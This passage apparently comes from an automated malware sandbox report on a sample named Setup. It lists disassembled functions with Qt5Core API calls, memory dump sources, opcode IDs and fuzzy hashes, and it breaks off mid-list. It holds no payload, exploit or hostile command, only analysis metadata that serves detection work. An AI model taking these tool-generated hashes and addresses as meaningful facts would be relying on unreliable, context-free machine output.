                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@$Url@@V0@@$BasicTimer@@$?setHost@Mode@1@@Mutex@@ParsingString@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2612093776-0
                                                                                                                                                              • Opcode ID: f3ebac3e03dba28860595c47fa4ce9eaea8ae8a48a80d848b5a0aabe1ad58cbe
                                                                                                                                                              • Instruction ID: 8907cec5398a93a1bafacb6e0f715cc5869ed9e303b0edad11591f1975cc0724
                                                                                                                                                              • Opcode Fuzzy Hash: f3ebac3e03dba28860595c47fa4ce9eaea8ae8a48a80d848b5a0aabe1ad58cbe
                                                                                                                                                              • Instruction Fuzzy Hash: F6118B62719B9286EB41DB22F9401AE7760FB94BD4F444431EE5E07B66DF3CD451CB80
                                                                                                                                                              Function 00007FFBA19791D0 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?className@QMetaObject@@QEBAPEBDXZ.QT5CORE ref: 00007FFBA1979214
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE ref: 00007FFBA1979228
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197653F), ref: 00007FFBA197925C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197653F), ref: 00007FFBA1979269
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19792AB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$?class?registerFlag@Flags@Init_thread_footerName@NormalizedObject@@Object@@@TypeType@Type@@Type@@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 521780993-0
                                                                                                                                                              • Opcode ID: b32e4e4ff902091fde932e109fb8cabb753e4e61c4d0e03af65d6bbb297502bb
                                                                                                                                                              • Instruction ID: 4c5f14424e42638212340d22328565a66bb00c490e9789a391c9b44c35a9047a
                                                                                                                                                              • Opcode Fuzzy Hash: b32e4e4ff902091fde932e109fb8cabb753e4e61c4d0e03af65d6bbb297502bb
                                                                                                                                                              • Instruction Fuzzy Hash: C3213CB5A0E68286EB82CB35F8401643361FF89764F804236DD6E432A5EF3CE505CF14
                                                                                                                                                              Function 00007FFBA197B610 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B625
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B630
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B642
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B64E
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B65A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?size@$?data@Char@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 315989962-0
                                                                                                                                                              • Opcode ID: 3cdef353a06d05c536ea6de30837be9e2bce93ed0d2bbf9e575cc36cb81c2102
                                                                                                                                                              • Instruction ID: 51b54532d7dbaf646b5475dd1fecebfbc1594d6e43de13700764938228426b4a
                                                                                                                                                              • Opcode Fuzzy Hash: 3cdef353a06d05c536ea6de30837be9e2bce93ed0d2bbf9e575cc36cb81c2102
                                                                                                                                                              • Instruction Fuzzy Hash: E90171A2A0DB4185DB81AB62F8440A96361AF89FD4B485032EE5E0BB55EF2CD495CF00
                                                                                                                                                              Function 00007FFBA19F7060 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?host@A@$$Array@@ByteComponentFlags@FormattingOption@Url@@Url@@@@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2158357590-0
                                                                                                                                                              • Opcode ID: 875465f099a035d2880700e8cc5a52caa9cc47cf28d96e162b98c0b37867a392
                                                                                                                                                              • Instruction ID: fb855ae40283aafffa128973734116d9ff505408f3a66afb96040a9d71a3d65d
                                                                                                                                                              • Opcode Fuzzy Hash: 875465f099a035d2880700e8cc5a52caa9cc47cf28d96e162b98c0b37867a392
                                                                                                                                                              • Instruction Fuzzy Hash: B601D8A2A0D90192EB91CB26E840279A361FFC8F94F494032DD5E47754DF3DD449CF40
                                                                                                                                                              Function 00007FFBA19F7120 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F7143
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F7157
                                                                                                                                                              • ??0QByteArray@@QEAA@$$QEAV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F716C
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F717B
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F718A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?scheme@A@$$Array@@ByteUrl@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1619984172-0
                                                                                                                                                              • Opcode ID: 0e6b4528e61cac5576d4e1a12acb5eabcc18e06c3e383b3aca50f4e281293e89
                                                                                                                                                              • Instruction ID: 3db09a6b8e406280e52332c911b1c8b2668447f7c4d9fc22a2d0092942ce2047
                                                                                                                                                              • Opcode Fuzzy Hash: 0e6b4528e61cac5576d4e1a12acb5eabcc18e06c3e383b3aca50f4e281293e89
                                                                                                                                                              • Instruction Fuzzy Hash: 6501D4A2B1D90192EB96CB25E84017AA362FFD4B94F454032EE9E47324DF3DD849CF00
                                                                                                                                                              Function 00007FFBA19F4E80 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@ByteV0@@$A@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 101242672-0
                                                                                                                                                              • Opcode ID: 75edb8f15fe0c4a917aee9bcf0621807c5f767e4d46334faf0db2d3d05bbca75
                                                                                                                                                              • Instruction ID: b7efddc2ceb8e558b61f8fb13e7f88a5e37ecf3e64b89c4992e674ee63f42beb
                                                                                                                                                              • Opcode Fuzzy Hash: 75edb8f15fe0c4a917aee9bcf0621807c5f767e4d46334faf0db2d3d05bbca75
                                                                                                                                                              • Instruction Fuzzy Hash: CE0175B2A1D94191EB91CF25E84417AA362FF94F94F558032DE5E47668DF3CD885CF00
                                                                                                                                                              Function 00007FFBA1A23C40 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23C5D
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23C77
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23C85
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23C93
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23CA8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3972277252-0
                                                                                                                                                              • Opcode ID: a1f1cad395e796fac9f2362e236e22f60a9bded8f670029bd457efdb4faa3b18
                                                                                                                                                              • Instruction ID: 38f9e14520d9f68b1841a6e324a904d264b7486a10b6d3c5a71bcf25a890b913
                                                                                                                                                              • Opcode Fuzzy Hash: a1f1cad395e796fac9f2362e236e22f60a9bded8f670029bd457efdb4faa3b18
                                                                                                                                                              • Instruction Fuzzy Hash: 56012DB3A09A46ABCB46CF35D54006C37B1F758B997409022CB5E47A18EF38E5A9CB90
                                                                                                                                                              Function 00007FFBA19EC240 Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@ByteV0@@$A@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 101242672-0
                                                                                                                                                              • Opcode ID: 21c16856e1f5fb951d767699350664308cf9d93b65c26a46de1acc2918d6a755
                                                                                                                                                              • Instruction ID: 7b15fece58b4623a7dfe45917a04022dface15ba773e0a2e7e357288bafb81e4
                                                                                                                                                              • Opcode Fuzzy Hash: 21c16856e1f5fb951d767699350664308cf9d93b65c26a46de1acc2918d6a755
                                                                                                                                                              • Instruction Fuzzy Hash: 8C0186A1A1EA4182DB92CB25F944179A361FF88FD4F545131EE9E07B58EF2CD845CF40
                                                                                                                                                              Function 00007FFBA197CBD0 Relevance: 7.5, APIs: 5, Instructions: 32timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?stop@QBasicTimer@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBE1
                                                                                                                                                              • ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBF8
                                                                                                                                                              • ?secsTo@QDateTime@@QEBA_JAEBV1@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC05
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC13
                                                                                                                                                              • ?start@QBasicTimer@@QEAAXHPEAVQObject@@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC34
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Time@@$BasicTimer@@$?current?secs?start@?stop@Object@@@TimeUtc@V1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4246650128-0
                                                                                                                                                              • Opcode ID: 97e1480332ee26c8bd4fc16990cf241f7ab8bf2c2384bc69976ca80e9fb2f627
                                                                                                                                                              • Instruction ID: 64eaac9dc80c2af961e4bedd984032e366a509bfbea34eae259e58278a32019c
                                                                                                                                                              • Opcode Fuzzy Hash: 97e1480332ee26c8bd4fc16990cf241f7ab8bf2c2384bc69976ca80e9fb2f627
                                                                                                                                                              • Instruction Fuzzy Hash: E1014F62E1AA8282D781CB71F4852296360FB58BA4F585432DE5A42798EF3CD995CF40
                                                                                                                                                              Function 00007FFBA1A23BC0 Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BD2
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BDC
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BE6
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BF0
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BFA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1688221058-0
                                                                                                                                                              • Opcode ID: ebb5100a450cd946070f20b3c16f1d6d68b3291ba60aa22ed7f0d9c8f937c1c3
                                                                                                                                                              • Instruction ID: da419ba259fd6e5e649017eada965d2273469ca95ff180676f2122e964291d1c
                                                                                                                                                              • Opcode Fuzzy Hash: ebb5100a450cd946070f20b3c16f1d6d68b3291ba60aa22ed7f0d9c8f937c1c3
                                                                                                                                                              • Instruction Fuzzy Hash: 5CF09492A0A80695EF56DF35D8544B83361FF54B19B545032CE1F45164EE2CE9DECF40
                                                                                                                                                              Function 00007FFBA1A23B60 Relevance: 7.5, APIs: 5, Instructions: 22COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23B70
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23B80
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23B8A
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23B94
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23BA2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1688221058-0
                                                                                                                                                              • Opcode ID: 230d0877cee7e173061b1f49d398b74ae07e6d35df208f468ca641d16a1fd42b
                                                                                                                                                              • Instruction ID: 6b07bd59102dc52039026a5ff281ac7f926fd0a3b447ec12460b1100efc7e2ec
                                                                                                                                                              • Opcode Fuzzy Hash: 230d0877cee7e173061b1f49d398b74ae07e6d35df208f468ca641d16a1fd42b
                                                                                                                                                              • Instruction Fuzzy Hash: 25F05EE3909A0692DB428F30DC441A82320FBA8B29F440231CE2E46295FF38C09DCB51
                                                                                                                                                              Function 00007FFBA19840A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1987D68), ref: 00007FFBA19840C2
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1987D68), ref: 00007FFBA19840F7
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1984113
                                                                                                                                                                • Part of subcall function 00007FFBA19D9A90: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,000000E8,00007FFBA1984122), ref: 00007FFBA19D9AAD
                                                                                                                                                                • Part of subcall function 00007FFBA1986880: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA198412A), ref: 00007FFBA19868C3
                                                                                                                                                                • Part of subcall function 00007FFBA1986880: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19868F7
                                                                                                                                                                • Part of subcall function 00007FFBA1986880: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1986904
                                                                                                                                                                • Part of subcall function 00007FFBA1984620: ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA198413E), ref: 00007FFBA19846A6
                                                                                                                                                                • Part of subcall function 00007FFBA1984620: ??1QUrl@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA198413E), ref: 00007FFBA19846B0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
